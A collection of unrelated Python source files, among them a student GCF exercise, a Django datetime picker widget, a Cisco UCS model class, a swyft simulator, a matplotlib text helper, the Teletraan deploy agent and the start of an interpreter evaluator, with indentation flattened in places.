# I used the one above to learn what the % operator does (This assignment became a lot easier after I learned that this exists :)
# https://www.mathsisfun.com/definitions/modulo-operation.html
# I used the one above to actually learn what modulo is because I have never used it before
def find_gcf(x,y): # Do not change function name!
# User code goes here
if x > y:
number = y
else:
number = x
for i in range(1, number + 1):
if((x % i == 0) and (y % i == 0)):
gcf = i
return gcf
if __name__ == '__main__':
# Test your code with this first
# Change the argument to try different values
x = int(input("Enter a number: "))
y = int(input("Enter another number: "))
print(find_gcf(x,y))
# After you are satisfied with your results, use input() to prompt the user for two values:
#x = int(input("Enter a number: "))
#y = int(input("Enter another number: "))
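# An alternative sketch (not part of the assignment solution above): Euclid's algorithm
# reaches the same GCF with repeated modulo operations instead of checking every candidate divisor.
def find_gcf_euclid(x, y):
    while y != 0:
        x, y = y, x % y
    return x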
|
the-stack_0_25874
|
__author__ = 'Alfredo Saglimbeni'
from datetime import datetime
import re
import uuid
from django.forms import forms, widgets
from django.forms.widgets import MultiWidget, DateTimeInput, DateInput, TimeInput
from django.utils.formats import get_format, get_language
from django.utils.safestring import mark_safe
from django.utils.six import string_types
try:
from django.forms.widgets import to_current_timezone
except ImportError:
to_current_timezone = lambda obj: obj # passthrough, no tz support
# This should be updated as more .po files are added to the datetime picker javascript code
supported_languages = set([
'ar',
'bg',
'ca', 'cs',
'da', 'de',
'ee', 'el', 'es','eu',
'fi', 'fr',
'he', 'hr', 'hu',
'id', 'is', 'it',
'ja',
'ko', 'kr',
'lt', 'lv',
'ms',
'nb', 'nl', 'no',
'pl', 'pt-BR', 'pt',
'ro', 'rs', 'rs-latin', 'ru',
'sk', 'sl', 'sv', 'sw',
'th', 'tr',
'ua', 'uk',
'zh-CN', 'zh-TW',
])
def get_supported_language(language_country_code):
"""Helps us get from django's 'language-countryCode' to the datepicker's 'language' if we
possibly can.
If we pass the django 'language_countryCode' through untouched then it might not
match an exact language string supported by the datepicker and would default to English which
would be worse than trying to match the language part.
"""
# Catch empty strings in case one sneaks in
if not language_country_code:
return 'en'
# Check full language & country code against the supported languages as there are dual entries
# in the list eg. zh-CN (assuming that is a language country code)
if language_country_code in supported_languages:
return language_country_code
# Grab just the language part and try that
language = language_country_code.split('-')[0]
if language in supported_languages:
return language
# Otherwise return English as the default
return 'en'
dateConversiontoPython = {
'P': '%p',
'ss': '%S',
'ii': '%M',
'hh': '%H',
'HH': '%I',
'dd': '%d',
'mm': '%m',
'yy': '%y',
'yyyy': '%Y',
}
toPython_re = re.compile(r'\b(' + '|'.join(dateConversiontoPython.keys()) + r')\b')
dateConversiontoJavascript = {
'%M': 'ii',
'%m': 'mm',
'%I': 'HH',
'%H': 'hh',
'%d': 'dd',
'%Y': 'yyyy',
'%y': 'yy',
'%p': 'P',
'%S': 'ss'
}
toJavascript_re = re.compile(r'(?<!\w)(' + '|'.join(dateConversiontoJavascript.keys()) + r')\b')
BOOTSTRAP_INPUT_TEMPLATE = {
2: """
<div id="%(id)s" class="controls input-append date">
%(rendered_widget)s
%(clear_button)s
<span class="add-on"><i class="icon-th"></i></span>
</div>
<script type="text/javascript">
$("#%(id)s").datetimepicker({%(options)s});
</script>
""",
3: """
<div id="%(id)s" class="input-group date">
%(rendered_widget)s
%(clear_button)s
<span class="input-group-addon"><span class="glyphicon %(glyphicon)s"></span></span>
</div>
<script type="text/javascript">
$("#%(id)s").datetimepicker({%(options)s}).find('input').addClass("form-control");
</script>
"""
}
CLEAR_BTN_TEMPLATE = {2: """<span class="add-on"><i class="icon-remove"></i></span>""",
3: """<span class="input-group-addon"><span class="glyphicon glyphicon-remove"></span></span>"""}
quoted_options = set([
'format',
'startDate',
'endDate',
'startView',
'minView',
'maxView',
'todayBtn',
'language',
'pickerPosition',
'viewSelect',
'initialDate',
'weekStart',
'minuteStep',
'daysOfWeekDisabled',
])
# to translate boolean objects to javascript
quoted_bool_options = set([
'autoclose',
'todayHighlight',
'showMeridian',
'clearBtn',
])
def quote(key, value):
"""Certain options support string values. We want clients to be able to pass Python strings in
but we need them to be quoted in the output. Unfortunately some of those options also allow
numbers so we type check the value before wrapping it in quotes.
"""
if key in quoted_options and isinstance(value, string_types):
return "'%s'" % value
if key in quoted_bool_options and isinstance(value, bool):
return {True:'true',False:'false'}[value]
return value
class PickerWidgetMixin(object):
format_name = None
glyphicon = None
def __init__(self, attrs=None, options=None, usel10n=None, bootstrap_version=None):
if bootstrap_version in [2,3]:
self.bootstrap_version = bootstrap_version
else:
# default to 2 to maintain support for the old implementation of django-datetime-widget
self.bootstrap_version = 2
if attrs is None:
attrs = {'readonly': ''}
self.options = options
self.is_localized = False
self.format = None
# We want to have a Javascript style date format specifier in the options dictionary and we
# want a Python style date format specifier as a member variable for parsing the date string
# from the form data
if usel10n is True:
# If we're doing localisation, get the local Python date format and convert it to
# Javascript date format for the options dictionary
self.is_localized = True
# Get format from django format system
self.format = get_format(self.format_name)[0]
# Convert Python format specifier to Javascript format specifier
self.options['format'] = toJavascript_re.sub(
lambda x: dateConversiontoJavascript[x.group()],
self.format
)
# Set the local language
self.options['language'] = get_supported_language(get_language())
else:
# If we're not doing localisation, get the Javascript date format provided by the user,
# with a default, and convert it to a Python date format for later string parsing
format = self.options['format']
self.format = toPython_re.sub(
lambda x: dateConversiontoPython[x.group()],
format
)
super(PickerWidgetMixin, self).__init__(attrs, format=self.format)
def render(self, name, value, renderer=None, attrs=None):
final_attrs = self.build_attrs(attrs)
rendered_widget = super(PickerWidgetMixin, self).render(name, value, final_attrs)
# if not set, autoclose has to be true.
self.options.setdefault('autoclose', True)
# Build javascript options out of python dictionary
options_list = []
for key, value in iter(self.options.items()):
options_list.append("%s: %s" % (key, quote(key, value)))
js_options = ",\n".join(options_list)
# Use provided id or generate hex to avoid collisions in document
id = final_attrs.get('id', uuid.uuid4().hex)
clearBtn = quote('clearBtn', self.options.get('clearBtn', 'true')) == 'true'
return mark_safe(
BOOTSTRAP_INPUT_TEMPLATE[self.bootstrap_version]
% dict(
id=id,
rendered_widget=rendered_widget,
clear_button=CLEAR_BTN_TEMPLATE[self.bootstrap_version] if clearBtn else "",
glyphicon=self.glyphicon,
options=js_options
)
)
def _media(self):
js = ["datetimewidget/js/bootstrap-datetimepicker.js"]
language = self.options.get('language', 'en')
if language != 'en':
js.append("datetimewidget/js/locales/bootstrap-datetimepicker.%s.js" % language)
return widgets.Media(
css={
'all': ('datetimewidget/css/datetimepicker.css',)
},
js=js
)
media = property(_media)
class DateTimeWidget(PickerWidgetMixin, DateTimeInput):
"""
DateTimeWidget is the corresponding widget for Datetime field, it renders both the date and time
sections of the datetime picker.
"""
format_name = 'DATETIME_INPUT_FORMATS'
glyphicon = 'glyphicon-th'
def __init__(self, attrs=None, options=None, usel10n=None, bootstrap_version=None):
if options is None:
options = {}
# Set the default options to show only the datepicker object
options['format'] = options.get('format', 'dd/mm/yyyy hh:ii')
super(DateTimeWidget, self).__init__(attrs, options, usel10n, bootstrap_version)
class DateWidget(PickerWidgetMixin, DateInput):
"""
DateWidget is the corresponding widget for Date field, it renders only the date section of
datetime picker.
"""
format_name = 'DATE_INPUT_FORMATS'
glyphicon = 'glyphicon-calendar'
def __init__(self, attrs=None, options=None, usel10n=None, bootstrap_version=None):
if options is None:
options = {}
# Set the default options to show only the datepicker object
options['startView'] = options.get('startView', 2)
options['minView'] = options.get('minView', 2)
options['format'] = options.get('format', 'dd/mm/yyyy')
super(DateWidget, self).__init__(attrs, options, usel10n, bootstrap_version)
class TimeWidget(PickerWidgetMixin, TimeInput):
"""
TimeWidget is the corresponding widget for Time field, it renders only the time section of
datetime picker.
"""
format_name = 'TIME_INPUT_FORMATS'
glyphicon = 'glyphicon-time'
def __init__(self, attrs=None, options=None, usel10n=None, bootstrap_version=None):
if options is None:
options = {}
# Set the default options to show only the timepicker object
options['startView'] = options.get('startView', 1)
options['minView'] = options.get('minView', 0)
options['maxView'] = options.get('maxView', 1)
options['format'] = options.get('format', 'hh:ii')
super(TimeWidget, self).__init__(attrs, options, usel10n, bootstrap_version)
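# A minimal form sketch (an assumption, not part of the original module): inside a
# configured Django project, one of the widgets above is attached to a form field like
# this; the form/field names and the bootstrap_version value are illustrative.
from django.forms import Form, DateTimeField

class EventForm(Form):
    starts_at = DateTimeField(
        widget=DateTimeWidget(usel10n=True, bootstrap_version=3)
    )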
|
the-stack_0_25875
|
"""This module contains the general information for EquipmentStorageControllerConfig ManagedObject."""
import sys, os
from ...ucsmo import ManagedObject
from ...ucscoremeta import UcsVersion, MoPropertyMeta, MoMeta
from ...ucsmeta import VersionMeta
class EquipmentStorageControllerConfigConsts():
INT_ID_NONE = "none"
POLICY_OWNER_LOCAL = "local"
POLICY_OWNER_PENDING_POLICY = "pending-policy"
POLICY_OWNER_POLICY = "policy"
SUB_OEM_ID_UNDEFINED = "undefined"
class EquipmentStorageControllerConfig(ManagedObject):
"""This is EquipmentStorageControllerConfig class."""
consts = EquipmentStorageControllerConfigConsts()
naming_props = set([u'vendor', u'device', u'subvendor', u'subdevice'])
mo_meta = MoMeta("EquipmentStorageControllerConfig", "equipmentStorageControllerConfig", "ven-[vendor]-dev-[device]-subven-[subvendor]-subdev-[subdevice]", VersionMeta.Version225a, "InputOutput", 0xfff, [], [""], [u'diagSrvCapProvider', u'equipmentBladeCapProvider', u'equipmentCatalogCapProvider', u'equipmentChassisCapProvider', u'equipmentDbgPluginCapProvider', u'equipmentMgmtCapProvider', u'equipmentMgmtExtCapProvider', u'equipmentRackUnitCapProvider', u'equipmentServerUnitCapProvider', u'equipmentSwitchCapProvider'], [], ["Get"])
prop_meta = {
"child_action": MoPropertyMeta("child_action", "childAction", "string", VersionMeta.Version225a, MoPropertyMeta.INTERNAL, 0x2, None, None, r"""((deleteAll|ignore|deleteNonPresent),){0,2}(deleteAll|ignore|deleteNonPresent){0,1}""", [], []),
"descr": MoPropertyMeta("descr", "descr", "string", VersionMeta.Version225a, MoPropertyMeta.READ_WRITE, 0x4, None, None, r"""[ !#$%&\(\)\*\+,\-\./:;\?@\[\]_\{\|\}~a-zA-Z0-9]{0,256}""", [], []),
"device": MoPropertyMeta("device", "device", "uint", VersionMeta.Version225a, MoPropertyMeta.NAMING, 0x8, None, None, None, [], []),
"dn": MoPropertyMeta("dn", "dn", "string", VersionMeta.Version225a, MoPropertyMeta.READ_ONLY, 0x10, 0, 256, None, [], []),
"int_id": MoPropertyMeta("int_id", "intId", "string", VersionMeta.Version225a, MoPropertyMeta.INTERNAL, None, None, None, None, ["none"], ["0-4294967295"]),
"name": MoPropertyMeta("name", "name", "string", VersionMeta.Version225a, MoPropertyMeta.READ_WRITE, 0x20, None, None, r"""[\-\.:_a-zA-Z0-9]{0,16}""", [], []),
"policy_level": MoPropertyMeta("policy_level", "policyLevel", "uint", VersionMeta.Version225a, MoPropertyMeta.READ_ONLY, None, None, None, None, [], []),
"policy_owner": MoPropertyMeta("policy_owner", "policyOwner", "string", VersionMeta.Version225a, MoPropertyMeta.READ_WRITE, 0x40, None, None, None, ["local", "pending-policy", "policy"], []),
"rn": MoPropertyMeta("rn", "rn", "string", VersionMeta.Version225a, MoPropertyMeta.READ_ONLY, 0x80, 0, 256, None, [], []),
"sacl": MoPropertyMeta("sacl", "sacl", "string", VersionMeta.Version311e, MoPropertyMeta.READ_ONLY, None, None, None, r"""((none|del|mod|addchild|cascade),){0,4}(none|del|mod|addchild|cascade){0,1}""", [], []),
"status": MoPropertyMeta("status", "status", "string", VersionMeta.Version225a, MoPropertyMeta.READ_WRITE, 0x100, None, None, r"""((removed|created|modified|deleted),){0,3}(removed|created|modified|deleted){0,1}""", [], []),
"storage_bios_mode": MoPropertyMeta("storage_bios_mode", "storageBiosMode", "string", VersionMeta.Version225a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
"storagepid": MoPropertyMeta("storagepid", "storagepid", "string", VersionMeta.Version225a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
"sub_oem_id": MoPropertyMeta("sub_oem_id", "subOemId", "string", VersionMeta.Version225a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["undefined"], ["0-4294967295"]),
"subdevice": MoPropertyMeta("subdevice", "subdevice", "uint", VersionMeta.Version225a, MoPropertyMeta.NAMING, 0x200, None, None, None, [], []),
"subvendor": MoPropertyMeta("subvendor", "subvendor", "uint", VersionMeta.Version225a, MoPropertyMeta.NAMING, 0x400, None, None, None, [], []),
"vendor": MoPropertyMeta("vendor", "vendor", "uint", VersionMeta.Version225a, MoPropertyMeta.NAMING, 0x800, None, None, None, [], []),
}
prop_map = {
"childAction": "child_action",
"descr": "descr",
"device": "device",
"dn": "dn",
"intId": "int_id",
"name": "name",
"policyLevel": "policy_level",
"policyOwner": "policy_owner",
"rn": "rn",
"sacl": "sacl",
"status": "status",
"storageBiosMode": "storage_bios_mode",
"storagepid": "storagepid",
"subOemId": "sub_oem_id",
"subdevice": "subdevice",
"subvendor": "subvendor",
"vendor": "vendor",
}
def __init__(self, parent_mo_or_dn, vendor, device, subvendor, subdevice, **kwargs):
self._dirty_mask = 0
self.vendor = vendor
self.device = device
self.subvendor = subvendor
self.subdevice = subdevice
self.child_action = None
self.descr = None
self.int_id = None
self.name = None
self.policy_level = None
self.policy_owner = None
self.sacl = None
self.status = None
self.storage_bios_mode = None
self.storagepid = None
self.sub_oem_id = None
ManagedObject.__init__(self, "EquipmentStorageControllerConfig", parent_mo_or_dn, **kwargs)
|
the-stack_0_25876
|
import numpy as np
import torch
import swyft
prior = swyft.Prior(
{
"ox": ["uniform", 0.0, 10.0],
"oy": ["uniform", 0.0, 10.0],
"a": ["uniform", 1.0, 2.0],
"p1": ["uniform", 0.0, 0.5],
"p2": ["uniform", 1.0, 2.0],
}
)
def simulator(a, ox, oy, p1, p2, sigma=0.1):
"""Some examplary image simulator."""
x = np.linspace(-5, 5, 50)
X, Y = np.meshgrid(x, x)
diff = np.cos(X + ox) * np.cos(Y + oy) * a + 2
p = np.random.randn(*X.shape) * p1 - 0.3
psc = 10 ** p * p2
n = np.random.randn(*X.shape) * sigma
mu = diff * 5 + psc + n
return mu
def model(params):
"""Model wrapper around simulator code."""
mu = simulator(params["a"], params["ox"], params["oy"], params["p1"], params["p2"])
return dict(mu=mu)
def noise(obs, params=None, sigma=1.0):
"""Associated noise model."""
data = {k: v + np.random.randn(*v.shape) * sigma for k, v in obs.items()}
return data
class CustomHead(swyft.Module):
def __init__(self, obs_shapes):
super().__init__(obs_shapes=obs_shapes)
self.n_features = 10
self.conv1 = torch.nn.Conv2d(1, 10, 5)
self.conv2 = torch.nn.Conv2d(10, 20, 5)
self.conv3 = torch.nn.Conv2d(20, 40, 5)
self.pool = torch.nn.MaxPool2d(2)
self.l = torch.nn.Linear(160, 10)
def forward(self, obs):
x = obs["mu"].unsqueeze(1)
nbatch = len(x)
# x = torch.log(0.1+x)
x = self.conv1(x)
x = self.pool(x)
x = self.conv2(x)
x = self.pool(x)
x = self.conv3(x)
x = self.pool(x)
x = x.view(nbatch, -1)
x = self.l(x)
return x
par0 = dict(ox=5.0, oy=5.0, a=1.5, p1=0.4, p2=1.1)
obs0 = noise(model(par0))
|
the-stack_0_25881
|
import sympy
class Text:
matplotlib_obj = None
def __init__(self, xy, text, color, fontsize, offset, halignment, valignment, bbox, latex, pixel, mplprops, figure):
if not isinstance(color, list):
offset = [offset]
color = [color]
xy = [xy]
text = [text]
halignment = [halignment]
valignment = [valignment]
bbox = [bbox]
latex = [latex]
pixel = [pixel]
self.matplotlib_obj = []
self.xy = xy
self.text = text
self.color = color
self.fontsize = fontsize
self.halignment = halignment
self.valignment = valignment
self.bbox = bbox
self.latex = latex
self.figure = figure
self.mplprops = mplprops
self.pixel = pixel
self.offset = offset
def __draw__(self, zorder=1):
for xy, text, color, offset, valignment, halignment, bbox, latex, pixel in zip(self.xy, self.text, self.color, self.offset, self.valignment, self.halignment, self.bbox, self.latex, self.pixel):
if pixel:
x=self.figure.px2unit(xy[0], 'x')+self.figure.px2unit(offset[0], 'x')
y=self.figure.px2unit(xy[1], 'y')+self.figure.px2unit(offset[1], 'y')
else:
x=xy[0]+self.figure.px2unit(offset[0], 'x')
y=xy[1]+self.figure.px2unit(offset[1], 'y')
obj = self.figure.ax.text(x,y,
"$" + sympy.latex(text) + "$" if latex else text, fontsize=self.fontsize,
horizontalalignment=halignment, verticalalignment=valignment, bbox=bbox,
color=color, zorder=zorder, clip_on=False, **self.mplprops
)
obj.set_clip_on(False)
self.matplotlib_obj.append(obj)
def serialize(self):
arr = []
for i in range(0, len(self.xy)):
arr.append({
"type": "Text",
"text": ("$" + sympy.latex(self.text[i]) + "$" if self.latex[i] else self.text[i]),
"position": [float(x) for x in self.xy[i]],
"xAlign": {"left": -1, "center": 0, "right": 1}[self.halignment[i]],
"yAlign": {"bottom": -1, "center": 0, "top": 1}[self.valignment[i]],
"fontSize": str(self.fontsize) + "pt",
"color": self.color[i]
})
return arr
|
the-stack_0_25882
|
# Copyright 2016 Pinterest, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import os
from random import randrange
import time
import traceback
import daemon
import logging
from deployd.client.client import Client
from deployd.client.serverless_client import ServerlessClient
from deployd.common.config import Config
from deployd.common.exceptions import AgentException
from deployd.common.helper import Helper
from deployd.common.single_instance import SingleInstance
from deployd.common.env_status import EnvStatus
from deployd.common import utils
from deployd.common.executor import Executor
from deployd.common.types import DeployReport, PingStatus, DeployStatus, OpCode, \
DeployStage, AgentStatus
from deployd import IS_PINTEREST
log = logging.getLogger(__name__)
class PingServer(object):
def __init__(self, ag):
self._agent = ag
def __call__(self, deploy_report):
return self._agent.update_deploy_status(deploy_report=deploy_report)
class AgentRunMode(object):
SERVERLESS = "serverless"
@staticmethod
def is_serverless(mode):
return AgentRunMode.SERVERLESS == mode
class DeployAgent(object):
_STATUS_FILE = None
_curr_report = None
_config = None
_env_status = None
def __init__(self, client, estatus=None, conf=None, executor=None, helper=None):
self._response = None
# a map maintains env_name -> deploy_status
self._envs = {}
self._config = conf or Config()
self._executor = executor
self._helper = helper or Helper(self._config)
self._STATUS_FILE = self._config.get_env_status_fn()
self._client = client
self._env_status = estatus or EnvStatus(self._STATUS_FILE)
# load environment deploy status file from local disk
self.load_status_file()
def load_status_file(self):
self._envs = self._env_status.load_envs()
if not self._envs:
self._envs = {}
self._curr_report = None
return
self._curr_report = self._envs.values()[0]
self._config.update_variables(self._curr_report)
def serve_build(self):
"""This is the main function of the ``DeployAgent``.
"""
log.info('The deploy agent is starting.')
if not self._executor:
self._executor = Executor(callback=PingServer(self), config=self._config)
# start to ping server to get the latest deploy goal
self._response = self._client.send_reports(self._envs)
if self._response:
report = self._update_internal_deploy_goal(self._response)
# failed to update
if report.status_code != AgentStatus.SUCCEEDED:
self._update_ping_reports(deploy_report=report)
self._client.send_reports(self._envs)
return
while self._response and self._response.opCode and self._response.opCode != OpCode.NOOP:
try:
# update the current deploy goal
if self._response.deployGoal:
deploy_report = self.process_deploy(self._response)
else:
log.info('No new deploy goal to get updated')
deploy_report = DeployReport(AgentStatus.SUCCEEDED)
if deploy_report.status_code == AgentStatus.ABORTED_BY_SERVER:
log.info('switch to the new deploy goal: {}'.format(self._response.deployGoal))
continue
except Exception:
# anything catch-up here should be treated as agent failure
deploy_report = DeployReport(status_code=AgentStatus.AGENT_FAILED,
error_code=1,
output_msg=traceback.format_exc(),
retry_times=1)
self.update_deploy_status(deploy_report)
if deploy_report.status_code in [AgentStatus.AGENT_FAILED,
AgentStatus.TOO_MANY_RETRY,
AgentStatus.SCRIPT_TIMEOUT]:
log.error('Unexpected exceptions: {}, error message {}'.format(
deploy_report.status_code, deploy_report.output_msg))
return
self.clean_stale_builds()
if self._response and self._response.deployGoal:
self._update_internal_deploy_goal(self._response)
if self._response:
log.info('Complete the current deploy with response: {}.'.format(self._response))
else:
log.info('Failed to get response from server, exit.')
def serve_forever(self):
log.info("Running deploy agent in daemon mode")
while True:
try:
self.serve_build()
except:
log.exception("Deploy Agent got exception: {}".format(traceback.format_exc()))
finally:
time.sleep(self._config.get_daemon_sleep_time())
self.load_status_file()
def serve_once(self):
log.info("Running deploy agent in non daemon mode")
try:
if len(self._envs) > 0:
# randomly sleep some time before pinging server
sleep_secs = randrange(self._config.get_init_sleep_time())
log.info("Randomly sleep {} seconds before starting.".format(sleep_secs))
time.sleep(sleep_secs)
else:
log.info("No status file. Could be first time agent ran")
self.serve_build()
except Exception:
log.exception("Deploy Agent got exceptions: {}".format(traceback.format_exc()))
def _resolve_deleted_env_name(self, envName, envId):
# When the server returns a DELETE goal, the envName might be empty if the env has already been
# deleted. This function would try to figure out the envName based on the envId in the
# DELETE goal.
if envName:
return envName
for name, value in self._envs.iteritems():
if envId == value.report.envId:
return name
return None
def process_deploy(self, response):
op_code = response.opCode
deploy_goal = response.deployGoal
if op_code == OpCode.TERMINATE or op_code == OpCode.DELETE:
envName = self._resolve_deleted_env_name(deploy_goal.envName, deploy_goal.envId)
if envName in self._envs:
del self._envs[envName]
else:
log.info('Cannot find env {} in the ping report'.format(envName))
if self._curr_report.report.envName == deploy_goal.envName:
self._curr_report = None
return DeployReport(AgentStatus.SUCCEEDED, retry_times=1)
else:
curr_stage = deploy_goal.deployStage
'''
DOWNLOADING and STAGING are two reserved deploy stages owned by agent:
DOWNLOADING: download the tarball from pinrepo
STAGING: In this step, the deploy agent will chmod and change the symlink pointing to
the new service code, etc.
'''
if curr_stage == DeployStage.DOWNLOADING:
return self._executor.run_cmd(self.get_download_script(deploy_goal=deploy_goal))
elif curr_stage == DeployStage.STAGING:
log.info("set up symbolink for the package: {}".format(deploy_goal.deployId))
return self._executor.run_cmd(self.get_staging_script())
else:
return self._executor.execute_command(curr_stage)
# provides command line to start download scripts or tar ball.
def get_download_script(self, deploy_goal):
if not (deploy_goal.build and deploy_goal.build.artifactUrl):
raise AgentException('Cannot find build or build url in the deploy goal')
url = deploy_goal.build.artifactUrl
build = deploy_goal.build.buildId
env_name = self._curr_report.report.envName
if not self._config.get_config_filename():
return ['deploy-downloader', '-v', build, '-u', url, "-e", env_name]
else:
return ['deploy-downloader', '-f', self._config.get_config_filename(),
'-v', build, '-u', url, "-e", env_name]
def get_staging_script(self):
build = self._curr_report.build_info.build_id
env_name = self._curr_report.report.envName
if not self._config.get_config_filename():
return ['deploy-stager', '-v', build, '-t', self._config.get_target(), "-e", env_name]
else:
return ['deploy-stager', '-f', self._config.get_config_filename(),
'-v', build, '-t', self._config.get_target(), "-e", env_name]
def _update_ping_reports(self, deploy_report):
if self._curr_report:
self._curr_report.update_by_deploy_report(deploy_report)
# If we fail to dump the status to the disk, notify the server of an agent failure.
# We set the current report to agent failure so the server will tell the agent to
# abort the current deploy, then exit.
result = self._env_status.dump_envs(self._envs)
if (not result) and self._curr_report:
self._curr_report.update_by_deploy_report(
DeployReport(status_code=AgentStatus.AGENT_FAILED,
error_code=1,
output_msg='Failed to dump status to the disk'))
def update_deploy_status(self, deploy_report):
self._update_ping_reports(deploy_report=deploy_report)
response = self._client.send_reports(self._envs)
# if we failed to get any response from server, set the self._response to None
if response is None:
log.info('Failed to get response from server')
self._response = None
return PingStatus.PING_FAILED
else:
plan_changed = DeployAgent.plan_changed(self._response, response)
self._response = response
report = self._update_internal_deploy_goal(self._response)
if report.status_code != AgentStatus.SUCCEEDED:
self._update_ping_reports(report)
self._response = self._client.send_reports(self._envs)
return PingStatus.PLAN_CHANGED
if plan_changed:
return PingStatus.PLAN_CHANGED
else:
return PingStatus.PLAN_NO_CHANGE
def clean_stale_builds(self):
if not self._envs:
return
if not (self._curr_report and self._curr_report.report):
return
builds_to_keep = [status.build_info.build_id for status in self._envs.values()
if status.build_info]
builds_dir = self._config.get_builds_directory()
num_retain_builds = self._config.get_num_builds_retain()
env_name = self._curr_report.report.envName
# clear stale builds
if len(builds_to_keep) > 0:
self.clean_stale_files(env_name, builds_dir, builds_to_keep, num_retain_builds)
def clean_stale_files(self, env_name, dir, files_to_keep, num_file_to_retain):
for build in self._helper.get_stale_builds(self._helper.builds_available_locally(dir, env_name),
num_file_to_retain):
if build not in files_to_keep:
log.info("Stale file {} found in {}... removing.".format(
build, dir))
self._helper.clean_package(dir, build, env_name)
# private functions: update the per-deploy-step configuration specified by service owners on
# the environment config page
def _update_internal_deploy_goal(self, response):
deploy_goal = response.deployGoal
if not deploy_goal:
log.info('No deploy goal to be updated.')
return DeployReport(status_code=AgentStatus.SUCCEEDED)
# use envName as status map key
env_name = deploy_goal.envName
if (self._envs is None) or (self._envs.get(env_name) is None):
self._envs[env_name] = DeployStatus()
# update deploy_status from response for the environment
self._envs[env_name].update_by_response(response)
# update script variables
if deploy_goal.scriptVariables:
log.info('Start to generate script variables for deploy: {}'.
format(deploy_goal.deployId))
env_dir = self._config.get_agent_directory()
working_dir = os.path.join(env_dir, "{}_SCRIPT_CONFIG".format(env_name))
with open(working_dir, "w+") as f:
for key, value in deploy_goal.scriptVariables.items():
f.write("{}={}\n".format(key, value))
# load deploy goal to the config
self._curr_report = self._envs[env_name]
self._config.update_variables(self._curr_report)
self._executor.update_configs(self._config)
log.info('current deploy goal is: {}'.format(deploy_goal))
return DeployReport(status_code=AgentStatus.SUCCEEDED)
def _update_deploy_alias(self, deploy_goal):
env_name = deploy_goal.envName
if not self._envs or (env_name not in self._envs):
log.warning('Env name does not exist, ignore it.')
elif deploy_goal.deployAlias:
self._envs[env_name].deployAlias = deploy_goal.deployAlias
log.warning('Update deploy alias to {} for {}'.format(deploy_goal.deployAlias,
deploy_goal.envName))
@staticmethod
def plan_changed(old_response, new_response):
if not old_response:
return new_response
# if the opcode has changed
if old_response.opCode != new_response.opCode:
return True
if not old_response.deployGoal:
return new_response.deployGoal
if not new_response.deployGoal:
return old_response.deployGoal
# if this a new deploy
if old_response.deployGoal.deployId != new_response.deployGoal.deployId:
return True
# if this is a new deploy stage
if old_response.deployGoal.deployStage != new_response.deployGoal.deployStage:
return True
return False
# make sure only one instance is running
instance = SingleInstance()
def main():
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('-e', '--server_stage', dest='stage', default='prod',
help="This option is deprecated")
parser.add_argument('-f', '--config-file', dest='config_file', required=False,
help="the deploy agent config file path.")
parser.add_argument('-d', '--daemon', dest="daemon", action='store_true',
help="Run deploy agent in daemon mode. Default is false.")
parser.add_argument('-n', '--host', dest="hostname", required=False, default=None,
help="Host name being used when interact with Teletraan service. "
"This is optional. By default the hostname defined in host-info "
"file will be used")
parser.add_argument('-g', '--group', dest='hostgroup', required=False, default=None,
help="Group name being used when interact with Teletraan service. "
"This is optional. By default the group name defined in host-info "
"file will be used")
parser.add_argument('--use-facter', dest='use_facter', action='store_true', default=False)
parser.add_argument('--use-host-info', dest='use_host_info', action='store_true', default=False)
parser.add_argument('--mode', dest='mode', default=None,
help="Optional. 'serverless' is the only non default mode supported. "
"In this mode, agent can be run for one time deployment without "
"interacting with teletraan service.")
parser.add_argument('--build', dest='build', default=None,
help="Optional. In 'serverless' mode, build information is needed in "
"json format.")
parser.add_argument('--env-name', dest='env_name', default=None,
help="Optional. In 'serverless' mode, env_name needs to be passed in.")
parser.add_argument('--script-variables', dest='script_variables', default='{}',
help="Optional. In 'serverless' mode, script_variables is needed in "
"json format.")
args = parser.parse_args()
is_serverless_mode = AgentRunMode.is_serverless(args.mode)
if args.daemon and is_serverless_mode:
raise ValueError("daemon and serverless mode is mutually exclusive.")
config = Config(args.config_file)
utils.run_prereqs(config)
if IS_PINTEREST:
import pinlogger
pinlogger.initialize_logger(logger_filename='deploy-agent.log')
pinlogger.LOG_TO_STDERR = True
else:
log_filename = os.path.join(config.get_log_directory(), 'deploy-agent.log')
logging.basicConfig(filename=log_filename, level=config.get_log_level(),
format='%(asctime)s %(name)s:%(lineno)d %(levelname)s %(message)s')
log.info("Start to run deploy-agent.")
client = Client(config=config, hostname=args.hostname, hostgroup=args.hostgroup,
use_facter=args.use_facter, use_host_info=args.use_host_info)
if is_serverless_mode:
log.info("Running agent with severless client")
client = ServerlessClient(env_name=args.env_name, stage=args.stage, build=args.build,
script_variables=args.script_variables)
agent = DeployAgent(client=client, conf=config)
utils.listen()
if args.daemon:
logger = logging.getLogger()
handles = []
for handler in logger.handlers:
handles.append(handler.stream.fileno())
with daemon.DaemonContext(files_preserve=handles):
agent.serve_forever()
else:
agent.serve_once()
if __name__ == '__main__':
main()
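# Hedged usage sketch (flag names come from the argparse definitions above; the
# script name and file path are placeholders, and the exact --build JSON shape is
# whatever ServerlessClient expects, which is not shown here):
#   Daemon mode with an explicit config file:
#     python deploy-agent.py -f /etc/deployagent.conf --daemon
#   One-shot serverless mode that skips the Teletraan service:
#     python deploy-agent.py --mode serverless --env-name myenv \
#         --build '<build info JSON>' --script-variables '{}'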
|
the-stack_0_25883
|
import ast
import object
import builtin_function
import environment
from typing import List
TRUE = object.Boolean(value=True)
FALSE = object.Boolean(value=False)
NULL = object.Null()
def evals(node: ast.Node, env: environment.Environment) -> object.Object:
if isinstance(node, ast.Programs):
return eval_program(node, env)
elif isinstance(node, ast.BlockStatement):
return eval_block_statement(node, env)
elif isinstance(node, ast.ExpressionStatement):
return evals(node.expression, env)
elif isinstance(node, ast.ReturnStatement):
val = evals(node.return_value, env)
if is_error(val):
return val
return object.ReturnValue(value=val)
elif isinstance(node, ast.LetStatement):
val = evals(node.value, env)
if is_error(val):
return val
env.set(node.name.value, val)
elif isinstance(node, ast.ArrayLiteral):
